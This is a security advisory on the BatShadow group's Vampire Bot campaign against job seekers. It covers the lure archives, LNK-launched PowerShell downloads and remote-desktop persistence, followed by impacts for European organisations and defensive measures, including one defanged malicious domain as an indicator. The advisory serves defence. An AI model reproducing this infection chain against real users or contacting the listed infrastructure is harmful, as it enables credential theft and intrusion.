The BatShadow group, a Vietnamese cyber threat actor, has been identified deploying a novel Go-based malware named Vampire Bot in a targeted campaign against job seekers and digital marketing professionals. The attackers use social engineering by masquerading as recruiters and sending malicious files disguised as legitimate job descriptions and corporate documents. The infection chain begins with ZIP archives containing decoy PDF files alongside malicious shortcut (LNK) or executable files masked as PDFs. When a victim opens the LNK file, it executes an embedded PowerShell script that contacts an external server to download a lure PDF and a ZIP archive containing XtraViewer remote desktop software, likely to establish persistent access. The campaign employs browser-specific social engineering by instructing victims to open malicious URLs in Microsoft Edge, circumventing script-blocking mechanisms in other browsers. The final payload, Vampire Bot, is capable of profiling the infected system, stealing diverse information, capturing screenshots at configurable intervals, and maintaining communication with a command-and-control server to execute commands or download additional payloads. The malware’s use of Go language suggests cross-platform potential and ease of evasion. BatShadow has a history of targeting digital marketing professionals with stealer malware and has previously deployed other malware families such as Agent Tesla and Venom RAT. The campaign’s sophistication, multi-stage infection chain, and targeted social engineering tactics highlight a focused effort to compromise professional users for espionage or financial gain.

European organizations, particularly those involved in recruitment, human resources, and digital marketing, face significant risks from this campaign. The malware’s ability to steal sensitive information, including credentials and business data, threatens confidentiality and could lead to identity theft, corporate espionage, or financial fraud. The use of remote desktop software for persistence increases the risk of long-term unauthorized access and lateral movement within networks, potentially compromising critical infrastructure and intellectual property. The social engineering tactics exploit common job-seeking behaviors, increasing the likelihood of successful infection. Additionally, the campaign’s evasion of browser security controls and multi-stage payload delivery complicate detection and response efforts. This threat could disrupt recruitment processes, damage brand reputation, and result in regulatory penalties under GDPR if personal data is exfiltrated. The targeting of digital marketing professionals also risks hijacking social media and advertising accounts, which could be leveraged for further attacks or misinformation campaigns.

Organizations should implement targeted user awareness training focused on recognizing recruitment-related phishing and social engineering tactics, emphasizing caution with unsolicited job offers and attachments. Deploy advanced email filtering solutions capable of detecting and quarantining ZIP archives with suspicious contents and executable files masquerading as documents. Enforce application control policies to prevent execution of unauthorized LNK and executable files, especially those with double extensions like '.pdf.exe'. Monitor network traffic for unusual outbound connections to suspicious domains such as 'api3.samsungcareers[.]work' and IP addresses linked to the threat actor. Restrict or closely monitor the use of remote desktop software like XtraViewer, ensuring it is only installed and used with proper authorization. Employ endpoint detection and response (EDR) tools capable of identifying PowerShell script execution and anomalous process behaviors. Encourage users to verify URLs independently rather than following instructions to switch browsers for downloads, and consider browser policy controls to limit risky behaviors. Regularly update and patch systems to reduce the attack surface and conduct threat hunting for indicators of compromise related to BatShadow’s known infrastructure and malware signatures.